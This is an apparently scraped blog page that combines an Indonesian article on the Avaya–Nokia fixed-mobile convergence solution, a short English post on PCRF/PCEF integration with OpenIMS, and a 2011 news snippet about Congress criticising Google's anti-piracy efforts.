1. Pengurangan kerumitan jaringan

2. membuat layanan – layanan yang terbaaru sehingga konsumen tidak bosan

3. Operasi yang efisien biaya.

AVAYA NOKIA NETWORK

Kemajuan teknologi komunikasi yang baru dan yang semakin canggih dan dengan harga yang relevan yang merupakan faktor pendukung kehadiran komunikasi bergerak (Mobile Communication) telah mengubah gaya hidup masyarakat modern.

Pada waktu yang bersamaan perusahaan-perusahaan telekomunikasi mulai bergerak meninggalkan jaringan yang terpisah antara suara dan data menuju jaringan yang terkonvergensi yaitu dengan menyatukan suara dan data.

Walaupun kemajuan dalam dunia komunikasi bergerak dan IP telephony yang memberikan dampak yang baik tetapi usaha ini dilakukan secara terpisah. Diman komunikasi seluler berfokus pada pengembangan produktivitas dan permintaan konsumen yang sering bepergian tetapi IP telephony lebih berfokus pada penyedia fungsi telekomunikasi ekslusif di dalam kantor yang tidak bersifat mobile sehingga perlu adanya usaha untuk menyatukan keduanya supaya menghasilkan produktivitas yang lebih baik.

Avaya dan Nokia melihat kesempatan untuk menyediakan komunikasi yang inovatif dan mudah diimplementasikan yaitu dengan menggabungkan keduanya.

Avaya dan Nokia mempunyai solusi fixed mobile converegence yaitu dengan mengubah operating system symbian menjadi virtual office pone yan menyediakan suatu interface untuk terhubung dengan Avaya Communication Manager.

Solusi yang ditawarkan memungkin pelanggan dapat menggunakan satu nomor dengan satu voice mailbox (kotak suara) yang akan memudahkan pelanggan untuk mengatur akses komunikasi yang mereka gunakan. Solusi ini juga dapatm digunakan oleh pelanggan dengan menikmati fitur-fitur yang ada dalam jaringan fixed Mobile yang tidak tersedia pada layanan seluler seperti call-coverage pada jam-jam libur, dialing yang singkat dan lain-lain. Selain itu user dapat mengganti kedua mode secara bergantian.

Referensi:

The IMS: IP Multimedia Concepts and Services in the Mobile Domain, Miikka Poikselka, John Wiley & sons, Ltd (ISBN: 0-470-87113-X)

Abdi Zaenal (2006), Industri telekomuniksi : Lokomotif pertumbuhan ekonomi dan kemajuan bangsa

IP Multimedia Sub System (IMS), Overview and Applications', 3G Americas, July 2004.

Mobile broadband, Gunawan Wibisono dan Gunandi Dwi Hantoro, 2008

"

PCRF and PCEF Integration with OpenIMS

PCRF (Policy Control Rule Function) is one of IMS architecture which support for policy and charging control decision based on session and media related information obtained from the P-CSCF. For that implementation, i’m use UCT Policy Control Framework at my OpenIMS. So you can get the detail information of that at UCT or FOKUS project. UCT Policy Control Framework have defined two software tool for implementation, they are PCRF and PCEF (Policy and Charging Enforcement Point).

Thursday, April 7, 2011

Congress Takes Google to Task Over Anti-piracy Efforts

Congress Takes Google to Task Over Anti-piracy Efforts: "
googleA congressional hearing this morning took on a confrontational tone as Representatives criticized Google for falling short on policing piracy online. After pointing out that El Goog did pull Grooveshark from the Market (which is apparently a good thing), the committee chairman Rep. Bob Goodlatte said it was not about what Google has done, ' But more about what Google has left to do.'

Comments